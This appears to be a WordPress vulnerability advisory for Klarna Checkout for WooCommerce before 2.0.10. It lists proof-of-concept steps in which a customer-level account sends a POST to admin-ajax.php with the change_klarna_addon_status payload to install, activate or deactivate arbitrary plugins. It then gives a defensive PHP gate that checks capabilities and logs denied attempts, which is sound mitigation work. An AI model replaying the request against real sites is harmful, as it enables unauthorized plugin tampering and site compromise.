Klarna Checkout for WooCommerce < 2.0.10 - Authenticated Arbitrary Plugin Deactivation, Activation and Installation

2020-04-09T00:00:00
ID WPEX-ID:10173
Type wpexploit
Reporter wpvulndb
Modified 2020-05-04T00:00:00

Description

WordPress Vulnerability - Klarna Checkout for WooCommerce < 2.0.10 - Authenticated Arbitrary Plugin Deactivation, Activation and Installation

1. Install WooCommerce and the plugin
2. Register as a customer in the webshop
3. Make a POST request to /wp-admin/admin-ajax.php with the payload:
   action: change_klarna_addon_status
   plugin_action: activate|deactivate|install
   plugin_slug: woocommerce/woocommerce.php or any other WordPress plugin slug
4. Observe that a plugin is installed, deactivated or activated
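
A defensive stopgap for sites still running a version before 2.0.10, as an added example that is not code from the plugin or from this advisory: a must-use plugin that rejects the change_klarna_addon_status action unless the caller holds the capability WordPress core requires for that plugin operation. The function name, the file path and the assumption that the plugin's own handler is registered at the default hook priority are hypothetical.

```php
<?php
/**
 * Added example, not Klarna's code: gate the change_klarna_addon_status
 * AJAX action behind WordPress plugin-management capabilities.
 * Assumed location: wp-content/mu-plugins/gate-klarna-addon-status.php
 */

// Priority 0 runs before a handler registered at the default priority 10
// (assumption: the vulnerable handler uses the default priority).
add_action( 'wp_ajax_change_klarna_addon_status', 'example_gate_klarna_addon_status', 0 );

function example_gate_klarna_addon_status() {
    // $_REQUEST is read so the gate sees the value whether it arrives by GET or POST.
    $action = isset( $_REQUEST['plugin_action'] )
        ? sanitize_key( wp_unslash( $_REQUEST['plugin_action'] ) )
        : '';

    // Capability that WordPress core itself requires for each operation.
    $required = array(
        'install'    => 'install_plugins',
        'activate'   => 'activate_plugins',
        'deactivate' => 'activate_plugins',
    );

    // Fail closed on anything other than the three documented values.
    if ( ! isset( $required[ $action ] ) ) {
        wp_send_json_error( 'Unknown plugin_action.', 400 );
    }

    if ( ! current_user_can( $required[ $action ] ) ) {
        $slug = isset( $_REQUEST['plugin_slug'] )
            ? sanitize_text_field( wp_unslash( $_REQUEST['plugin_slug'] ) )
            : '';
        // Leave a trace for incident review: who tried what, against which slug.
        error_log( sprintf(
            'Denied change_klarna_addon_status: user=%d action=%s slug=%s',
            get_current_user_id(),
            $action,
            $slug
        ) );
        wp_send_json_error( 'Insufficient permissions.', 403 );
    }
    // Authorized caller: return so the plugin's own handler runs next.
}
```

wp_send_json_error() terminates the request, so a customer-role account never reaches the plugin's handler; the error_log entries double as a detection signal for attempted abuse.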